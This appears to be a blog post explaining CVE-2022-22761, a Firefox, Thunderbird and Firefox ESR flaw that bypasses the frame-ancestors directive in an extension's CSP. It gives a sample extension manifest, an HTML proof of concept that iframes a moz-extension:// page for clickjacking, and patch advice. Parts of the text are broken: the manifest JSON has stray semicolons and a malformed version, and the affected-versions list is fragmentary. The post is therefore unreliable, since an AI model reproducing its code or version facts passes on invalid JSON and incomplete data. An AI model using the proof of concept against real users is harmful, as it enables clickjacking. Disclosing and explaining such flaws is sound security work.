CVE-2022-22761: Bypassing Frame-Ancestors Directive in Mozilla Firefox, Thunderbird, and Firefox ESR with a Web Extension Vulnerability

In this long read post, we will discuss a recent vulnerability known as CVE-2022-22761, which affects popular web browsers and email clients like Mozilla Firefox, Thunderbird, and Firefox ESR. This vulnerability allows an attacker to bypass the frame-ancestors directive in a Web Extension's Content Security Policy (CSP), potentially leading to clickjacking or other unexpected security behavior. We will provide code snippets, original reference links, and details on how to exploit the vulnerability.

Mozilla Firefox ESR versions less than 91.6 (< 91.6)

When a Web Extension uses the moz-extension:// scheme in its CSP, the frame-ancestors directive is supposed to be enforced. However, this vulnerability allows attackers to bypass this directive, potentially enabling clickjacking or other security threats.

Let's assume a vulnerable Firefox add-on has a manifest.json file like below

{
  "name": "Vulnerable Add-on",
  "version": "1.",
  "manifest_version": 2,
  "homepage_url": "https://example.com/";,
  "permissions": [
    "webRequest",
    "webRequestBlocking",
    "https://*/*";,
    "http://*/*";
  ],
  "background": {
    "scripts": ["background.js"],
    "persistent": false
  },
  "content_security_policy": "script-src 'self'; object-src 'none'; frame-ancestors 'self' https://example.com;";

}

The content_security_policy is set to only allow iframes or embedding from the extension's own pages (using "self") and from https://example.com.

However, due to the vulnerability (CVE-2022-22761), the frame-ancestors directive is not correctly enforced on the web-accessible pages (those using moz-extension:// scheme). An attacker can potentially create a malicious webpage that takes advantage of this security issue:

<!DOCTYPE html>
<html>
<head>
  <title>Malicious Page</title>
</head>
<body>
  <h1>This is a malicious page</h1>
  <iframe src="moz-extension://Vulnerable_Web_Extension_ID/somepage.html" width="300" height="300"></iframe>
</body>
</html>

In the above HTML code, the attacker has embedded the web-accessible extension page in an iframe without being restricted by the frame-ancestors directive.

Exploit details and mitigation

To exploit this vulnerability, an attacker would need to create a malicious webpage that embeds a vulnerable extension's web-accessible pages using the moz-extension:// scheme. Users who visit the malicious webpage may then be subjected to clickjacking or other security threats.

If you are the developer of a vulnerable extension, you should update your extension as soon as possible and test it to ensure the frame-ancestors directive is working correctly. In addition, users of Firefox, Thunderbird, and Firefox ESR should update their software to the latest patched versions (Firefox >= 97, Thunderbird >= 91.6, and Firefox ESR >= 91.6) to ensure protection against this vulnerability.

1. Mozilla Foundation Security Advisory 2022-08: https://www.mozilla.org/en-US/security/advisories/mfsa2022-08/
2. CVE-2022-22761: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22761

In conclusion, CVE-2022-22761 is a security vulnerability in Mozilla Firefox, Thunderbird, and Firefox ESR that allows attackers to bypass the frame-ancestors directive in a Web Extension's Content Security Policy. The exploit can lead to clickjacking attacks. To mitigate the issue, ensure that your software is updated to the latest patched versions (Firefox >= 97, Thunderbird >= 91.6, and Firefox ESR >= 91.6).

Timeline

Published on: 12/22/2022 20:15:00 UTC
Last modified on: 12/30/2022 14:02:00 UTC